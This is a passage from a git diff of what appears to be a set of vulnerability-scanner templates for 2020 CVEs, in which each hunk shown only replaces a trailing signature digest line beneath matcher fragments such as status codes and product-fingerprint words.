4a0a00473045022100d2400625cf515deb5825ada0a9e3c2f9e5f633fe9fbf4422ee675c84b6df489e02202bce30f70d11d8b75e28be4fb3015737a71d8009c61394ae61b2fedfd6bbeab3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201b65fd5c289e81eded6b29a5b6ef5cdd3625eb33124c866df497edc29fc83d9d022100b6e27e84806838c514fe60e8d34760d421de5040bfa1838209396772f1163854:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 04636e2997e..3352c16bfb8 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008075bb2133b50b8746e3ea58cbca8cd03e40a1f29be518798aa3be6abb6ffd5602200c71fb9fb7f2f9ca0733118f067de0f65f187672d6b06cdeea245a3b3f31771a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d416964288a18afaba9300f5d03cc1a3b7f4c7ce164f2789f0ed97188d071fa70220026e16149eea15169158f2fb142bb716b904b74259f9aa8812a32e5146870047:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index dc0577bab61..ceaa39fe620 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -41,4 +41,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a00463044022044f9b0604f98e2cd23be6995f8fcae3df87fd80f3b8b62cecd7508f6a5ab25a602201648bf477d68b01d4dadbb773dfd44263dca56c122c2e1262e96b79446ca2a06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f3811634167cade0bfd2a64db3ec6883b387a3151c61123dbea96c92b0ea7011022100c3dafeaceedc2ba6a6bcdaca89ba92dbb76903afc913977a730d1ef3b79d5ce2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 417f7b98068..b5882d472f3 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502205f4ce1af8b7d4d16911d70247a6ffe94c779a24b0ae426a3f991fd2518836a1e022100cdd58831955afd6fd1a103c4615b950350be19c284b461626bf51f4dc555f32f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dbbac3fcc2b6ef4d5b3f6e725090c368eb0088d344ffb9d7461dcf00a43cc15002207f14e11828ef37c616ec2177d5a203e7fc3535b4d396c536364747ac7de220e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index 997c655b123..952134e3dd0 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022025bfa3d9a36698c484ada927179949aac5acb3e7ab8e2883d2e68b694e84c88b022100d4ff92298dce4c31dbb70763efc6590b471fe3ef4bcbc52661e34c7a6ecae378:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220707e54d954b6c25f0ee2d74c93a0e8176d5e433a09e0bd0c5f9407089cf78f56022014fb219e70dbc9fcb8a88e8952f96526c7dd14ebfec03f26e89b8c3a21c5e7d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 167e0cefeb8..2fa698454d9 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022072b77ddff74ec0380d74eac3b76bb27c994e755ae918d4a04e4465d33d3253a20221009131f31624cfb4a461cbd749f89628f15e9ecb79a71641a7337075e4fc51e399:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c4b5d0cee0222a6f0fddcf5af255c7fad36b4a339cb45b635f88e331c2882e6d022041f04fdef46b552cdc768ad221de3c112bd8287e618bfb6d184a57cd85d489e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15906.yaml b/http/cves/2020/CVE-2020-15906.yaml index 897ef1e2c67..f081e5b90fd 100644 --- a/http/cves/2020/CVE-2020-15906.yaml +++ b/http/cves/2020/CVE-2020-15906.yaml @@ -156,4 +156,4 @@ http: - "Show on admin log-in" - "Tiki Setup" condition: and -# digest: 490a00463044022059528763e3410d36174da5ca0fd0a5aa5cb97880b746d0d9e42ed058eef0573202205244913aa2d52481503742cda9152414a1b1dfa0ab4dc36a9b7c640a5d6c0a22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022003b60e55efb2fec62bf86bad5e464966be8a8b0ff6af1056fd7824dfa479a4e7022100fc292158ea4ca414723750d4df4f7635c163285d76d1205c1cab0b68a5342bf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index 8d7e70a9957..9bba0323199 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100aa860ce8ac6c2c8c1948545bd0e822be90be674d1f410f48fb99c5cfb2cb4e47022062bf6e23c0f99a1c752f85b4b43318b8c82705fbc5e82f7eb01ff1a64bde56cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022068f67a3d47523ce91b74fbc45e810a77820f2b370b993be24ec969f260109baf0220790b66baaa3867084f7187e71a065017a8793def11a1b5c0d1b4d030e6c490ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 68e00ff0a0c..b4234789514 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220435dcbda48e8c99b6fe6107b4179c2a57f9f429f19abfac5615b8b493ce363db02200431917e2ff49ae322c9b70585fcc1f8d6dec21a9f688923b03b30903216fc01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008c37f3e84ebb1ad481817a5076695515180d253a6c43ea7aa853c18bd0b7148d022100b89eedd75f7f4745215517e847d68fe2e27eca915141c90899f01f525dc37ed0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 3b5cc79c0a0..e9d1f62e600 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210094b974a777f66922a69dcfc7b27f94150582ed20f5150abd0048bf1a8faaf678022100da6fcbf63bb36f49088896cc2e4fad206b817ab0fcfbf70c0567e7a7f56a95a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206040a864bcda9129fd99bf0153c30ba053a9a359a2befb14bdbe04bc012da90c0220496a3f3977e5b776deab245530a10d493314e4b3df28759de6949729db309438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index efccf71a22c..8b5b19e5fd4 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -65,4 +65,4 @@ http: - 'status_code_3 == 200' - 'contains(body_1, "FUEL CMS")' condition: and -# digest: 4b0a00483046022100fad245c71f06d38e617fa51ab5248534c2e50de93b548128cdc23fc217aba5f0022100857318fd08a80c6d553ab17d1ea37bb977d404f29c845e3597949aaff0804ad3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e288039fe6afc75911fc92c7f49d30c9404b70ff3fe5fdbf211e67e4e4e8a06c0221008ff37ccab63949c48b87ce3e3c5a73e4813945083ef98b068f19b3bc079025b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 29ad154f67a..8229f76f996 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009eb92da8197032ca726f66d287d0d68dbe81fe0fbdb2188e8ad82944597d1a8002204070b7b1ec02ab90b5d5d359dfb7eca58c001ca71fe431c9bafb23e93b7b6d8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205347f3189d7eaf5e5e5957c337b3a9b0826bee86d024b082b78c39c27b9813ab022033828eed7d462b87521af20759e413461a1c145ab846d891e863b37847057010:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index 6d127a06c4f..4ed408b990d 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f911a4e8166f527bfeaef54512e96996ae7499c6f8fc2d4875d987c3da78470022100b37da9d1aef4c6128bf616a56df270c8fe195deae73db9304a399d4341d098ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba489be85aae9c77b9a42a018550d7f3c6187b73d64bf5f108ace193c9e76378022100ff2dcbeea4786c11a041fbff8ac981d165ee85c9c9f2a84408b6c8cf2e2c0ea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index 67a0cab9ca7..21265dec01c 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -59,4 +59,4 @@ http: - type: kval kval: - "PHPSESSID" -# digest: 4a0a00473045022057907283725c1d1dfc077976b67edea39b5a7561de9e11ace9a06872815705aa022100ba687daf1331e5df11b855ac49d85a19058980a968eef7137dcb317016a535ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b8631bb0fe2b45911668cc082ef574dec3e266ca691a6dc01d754d9848fa8f4d02207e0ff5e0c54c5f99c5d1ef79f279f727269fbad0dd9102b2423dda9d69988ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index 5f9a2abc1a2..3ce20aaa7ab 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -69,4 +69,4 @@ http: - "SLA Misses" - "Task Instances" condition: and -# digest: 4b0a00483046022100ea26c2d810e473313c9431bf040aa2fbfaa2158b128d08c64951cea7055b9943022100cfd31afff5834a80d47038f46904ee494fcf50993384391a60d2db25a2a4317b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022037b0aff5f5f08a00fa828742a5b2e5cf209d5393f4677b0983af10f767c8941202202940e05e6f23fae0d47d7079fc12c52dfcf8b4e01a81bef3f8cf816415664218:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index e95b99fb033..743f268123d 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c6be7fcdf8cdd34d7080ec99e4983519ee418ce11816e2fc5e04d4f010730993022007ca1eb016bf586a712d7fd8bddb97ef5564ba11716edf6a551c96c92895a695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c142c416a4e89ea5161fad636bd9e82c5d55e6b77e0327993fa42b6d435ac7c022100d0d63626e2c59bd84ceed7851cebb78f3ed9af647f30fe722ce10c920c706997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index 82eb500688c..1dade5eb60c 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200c16afca70efd58d4a7eab451fcff301df4088e7d3315e48138cfd10e3d77bfe022016acb2f47280fa8f88f99ba60557c2cbda58ff64f665cafe9aeb96f8735c7c84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220231af43d7347aec29723e5046b912ffcc2e6e009a35229003412769cc6bb6b040220108cc8a5b98ead744ff483cc2a2d0c12bc6782e433d69f99acf69f0640ed338f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19363.yaml b/http/cves/2020/CVE-2020-19363.yaml index fb9d47c4bec..dcd9a62ae46 100644 --- a/http/cves/2020/CVE-2020-19363.yaml +++ b/http/cves/2020/CVE-2020-19363.yaml @@ -42,4 +42,4 @@ http: - 'contains_all(body, "Index of", "vtigercrm", "Parent Directory")' - 'contains_any(body, "Smarty", "PHPExcel", "adodb", "nusoap", "tcpdf", "vlayout", "v7")' condition: and -# digest: 4a0a00473045022016b6704a4b69933972334f85064bca30d4ce656592a32f639f78c5a91ab72b680221008769c270b7dacf293ab61f1375f9379b4e8e68e916f75053be0f4316c19117d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207e51bf6b1b27f9bafaaff4733adc21d6aa2d0bc3844aa8b55f9c33cce74274fc02207f343247af3fb7a871010b785ccbf2491e8ce56efd6e7eb03cce5c234e2e5af3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index ea46d681f54..7ea33aedd01 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022020d2f12084d617ee9d47e5006ec814f3d11e00414194a408a8dd6daa5c25523e0220551e7379ea042c08b2cb71d7660b68be49295e22bd17a02c56eba058735f6f73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220515ae84521114a1d61d8ef5480567ecb0cf3ab1153d0d4b76d813261a41cd6cf0220611462d063c274e420e401571ff55247ed34dd4c88a9332364cbba458deb0632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index 3b42d1da5e4..2d8141e353b 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d9c1d84598467fb0e881d9a5818639b96e30be7fbedf9ffb95c22fa9c5eef2e0022002e0625491bea918cf288f1089b9051f5267831234142c044c72bd2dac780ba3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206d878c70f6960032899869e2e3ab8599d90a2f0d9640a1303c64426682ccaa36022027a3bb5c93b5c3a3d1c32eeda4d04288a8989a58bcd70c361d072046ab3df662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index d119da654cf..66de09e7f15 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a988a8d4ef670c8b78a75cad803445511a16e9f44f747a99222f9ca225373a7b022033b271c9528229f6e5cab8f976044f01342b25f0373c2d208c74fdd2eb1a03d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec48bfce66c3610c2ef1ed9707b54b8030717275c5a13b6bf7957f8766861c160221009c32167c36ea5246703189a31735b2b993a02069f6bd388d5ae9e52ee0e94f0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index 63f902d0ad5..085ce589541 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100c69bb166b1a6115194dc03b37d0ae08e80d42d4b3df36245056156726c328f050221009d10cc4832c43b6e12585c05542d63a22ff2d985daae40f038822a880228dbee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a50f5ef74889f54c4052277b634f5c87d8541e5a75c051d224078747b3697b4b022100af8f9faa3ae715cc3663843939f843a1d1e155759b647b50f8b33c8ebdf27bc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20601.yaml b/http/cves/2020/CVE-2020-20601.yaml index 3594ccecef5..2562bb9cd6f 100644 --- a/http/cves/2020/CVE-2020-20601.yaml +++ b/http/cves/2020/CVE-2020-20601.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dadf3be4eb70e59a5104d07a450eb12c3db9f23188ccd3720b069662b216f37302206d8c65402899549f4298086af9be0926186111d80d3bf1ed81bcb6e2aa06f49c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202c5c931773a8fd9f9a3ea4880b34465e8f9c08a02f826728808daa452dcc48be022022c9d3aa36f7e85dfff966cb36a47f9ef00b3c92b134350a19bb40750ae43da5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20627.yaml b/http/cves/2020/CVE-2020-20627.yaml index 2e8be434208..5c22a8e238f 100644 --- a/http/cves/2020/CVE-2020-20627.yaml +++ b/http/cves/2020/CVE-2020-20627.yaml @@ -79,4 +79,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022004887acbb7b7be45311fbba1971f1c8ecaa8d3552bcc20e8b13fdf01d458bd2b022100f50cabe288f97cb98afde867eec6ca8b40b5f0c4036e6d7dade895ab713aad3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fbd9fd63fc3b642f2825ad976a4be01dc1bbc3c5676ab07deb19f4e90edf18740221009c355d5c577a627558eb3723aeb2afdc8008b7e8f5321f1c57e0613f3acf52ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index 86e39297be1..509ee5c32ed 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "value=\"\"/>")' - 'contains(body_2, "DomainMOD")' condition: and -# digest: 490a0046304402202065eb995464b28c2265251a8fb3801afd8b426e9c4193259cac4dfab6c907e402205ebbf8613faefc99c502348c2265af43fb35df6ee9486a94f2b7d406a813b853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022031bd05d9a9de700b8aa103308925c8118f0d1154bdfa2c4a23a7f60c349ef992022100a7cea54b325c849793893818466d62c15910517b5cd766cb534fdc8d76d2e7b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index 57d496b6804..ee60de22a10 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -68,4 +68,4 @@ http: - type: kval kval: - x_jenkins -# digest: 490a004630440220382124b19cd8cbf933610843fb40446b7794584c1be4dc095c9dd50753bf7611022044b70c3aa62ff3b4158e6cfb8b8abaaaeb3154dc44d3f84222347dd0ef0e2de6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bd1c61fafdbdcac23a29f88bf1a30ce3fcbe026330c3a7e3cb0af01b342aab45022100b1b603a0732a33e3c97f93064681cf71b30b72cdb6ecaf159af6c838c16cee4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index b87d7c7dcdc..da330e0bd24 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ac29c352834b9626555a42c8d28f9b071bbcab2e828c94fe6b69c470ef2cef9102207d8de347c908df1bb9c098c6f51268ba5bae4f392beefca08ddd8cdca2a2094b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a7a0022e84050e97174a3eb27efe89e08227918fc866bac50b305074bee9ed44022100e63030f912fa0a25d1da869a70d06a0d97a94c97c9b9bf962be9ac6d19afe950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index 17745515d67..5b7730b848d 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d14748fe17414d0d80809ee24b8075d3ed2c8c33c7531452def3c130ac6e8fc02206b72d16dd715628e80a1a899f133b53b5385dcd696d420ed7f3a0c61714d34d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d456bdb1b60cdfd6dcae6405a9ae50e2e633f254168a3f57b31f436bec132d96022100e4775bfae2b4cf94b9566bfff6562cb4cbd8244c7e5f62de0ec78aad788e429d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-21998.yaml b/http/cves/2020/CVE-2020-21998.yaml index d00ccab1a52..a3e60b73a82 100644 --- a/http/cves/2020/CVE-2020-21998.yaml +++ b/http/cves/2020/CVE-2020-21998.yaml @@ -39,4 +39,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header -# digest: 490a0046304402202d6365d7cc3f0e39ad588dfffea24c1d9538e32043b2ba9dcebd64d404c23565022055caf88a9dae7a36415498097c320514b23027981e6321f551cb2c369903360b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201317b4d45f28b5f2a9f6114d7cc40431ba187195d0dea23505a2ffed7f9f75bf022100af74dc8586dd2f326c008578bc242ea01a01d22c5d33a58732be865c26bd598d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22165.yaml b/http/cves/2020/CVE-2020-22165.yaml index 006d5e2d7aa..b2a9a011a15 100644 --- a/http/cves/2020/CVE-2020-22165.yaml +++ b/http/cves/2020/CVE-2020-22165.yaml @@ -62,4 +62,4 @@ http: - 'duration>=8' - 'status_code == 200' condition: and -# digest: 4a0a0047304502202824aed4fb066520e371361b6baa2579991ced60a437a15a789fa59f51bb9a25022100d91e51dda8a9ce29b411113c95278581ed5c4d2f6d7776f49f2dccee5ff95a57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca45fd025258e43c1c94aeec2c53a5e33ac90750b88b94d2b50c7838e874c20c022100e0137cb13dc8f3146c85df0a83f2f839359d2caa54e57a2c665a5ab816e46219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index 3f2eaf2c125..e2c513d0210 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -44,4 +44,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 490a004630440220719e75b25511632bdefb7d80893617363fac11f3f80ef25d5b930599cc4a9e9a02207651b59d98cf43b2f107b45c293b7b8bb21d320f3906f8d452f25149ac34346b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d1e3cc8eb9e8ade5090591aab753a3651f6f96ab8f4675b6dfcd39a2e41d57f022100f2b513b984a67a3849215dc4c05519219b6a6a488f9349c175b468bd74d8ac77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 6a9cb60980f..bce8f629e8c 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -46,4 +46,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4a0a004730450220749fe1ba037d2f21af159a3f9fc3f392a841d354ceafe093a5642164efc0290b022100dc38daa0149b406f56e934829fb4eb988c1a63be86f3fb6ee0b6d4a4b82d32bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c45e62b9dfcd3a5550dccf6e02a3a70609932c87457eb359e8c7542653c0245022100f0227d6d3002ba324e14940fa7ec91c4273e46ff690ebdfac5cd401543aed2c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 4d26e4fce5b..219933f7b77 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -44,4 +44,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 490a0046304402201e7b32102e72d0ae16a806ef38634235f7267d782821388779372f87d16ccc1102205b3e60c7d9f88f32d10d784d5a0317f377370dd3bf4059da96142c3bbe34a10f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d42c740aaf2b313d735ccd759b3ab7aff522e75ab99f636deea633508d1d7ec6022100f663e8e96fc832354245545dcdae4a11735beb425c3918a2074d65eb977e60a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index 140a2f1e5d7..dcbff42cb47 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 4b0a00483046022100add20e13fe74a2065f2562bf6ce8749c1f2bb745396eda0276547ae9132f5ebe022100bb7738133105fa599d718987ebfafb11e2ccc5f7ce20a225f50f9b4338c5f74b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220253a76bc061d935e1c580351ab4b893bdf1a34be9e922b426e97b304372a014202201a5a6d5f4973eeb81e768d5db0657a775671f72820a0f63e6c7a333e6c34cbe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 992614d557d..2c441b6923b 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206a92f00e4fe94aa6286e04f0c77c339ead4a046bb82c19fe8f61afb1e6bbba12022100932c40a3fc88573b44e8c06c6b7f5ffebabe61e122075572aed38b4b77cd40a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022053c72f4ad54cdb541f4e53afcc949bb29cb35e3065bdea2e1e8ff8980ecae84102210091e8f2304a36fdd9436f6d18564ebd838aa1912af4531d2ec699870a1bcb7735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index bfac0344412..de3a552d094 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -71,4 +71,4 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body -# digest: 4a0a0047304502205d38d222ffb78eb6d9c1b47e3b31148ab31d01345df52c923e4b1da289072294022100c19c1a6b72a8c814da766c7fd0c7c698b6b84043b47c250650bc2e42ba6cb63e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202cf78a10159d27049e3a13113e1ec2d30c5749f362c0cbb97f1663da59e5bd5002203ba54355fb95c91e8323f9563e268eec5a4b2c1ccebedd71b790d4fe7b569f56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23814.yaml b/http/cves/2020/CVE-2020-23814.yaml index b4c6dbcdb4f..dbb672696af 100644 --- a/http/cves/2020/CVE-2020-23814.yaml +++ b/http/cves/2020/CVE-2020-23814.yaml @@ -114,4 +114,4 